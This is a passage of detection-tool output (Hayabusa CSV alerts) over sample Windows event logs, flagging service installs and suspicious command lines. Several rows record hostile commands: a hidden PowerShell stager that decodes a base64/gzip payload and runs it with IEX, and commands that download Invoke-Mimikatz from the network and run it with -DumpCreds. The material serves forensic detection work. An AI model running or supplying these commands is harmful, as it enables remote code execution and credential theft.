IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex
021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:32:11.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:32:11.932 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:32:15.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:03:41.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:04:04.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:05:07.184 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:05:22.839 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:38:23.648 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:28.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:32.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:32.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:38.772 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:41.273 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:41.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:52.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:29:34.138 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:29:34.389 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:29:35.564 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 
0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:36:49.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:36:49.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:36:50.791 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:00:02.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:45.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:45.870 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,ResDev,Relevant 
Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 10:00:00.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 10:28:55.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 10:28:55.343 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:31.558 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:32.423 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:32.538 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:43.023 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:44:04.646 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c 
""""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:44:04.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 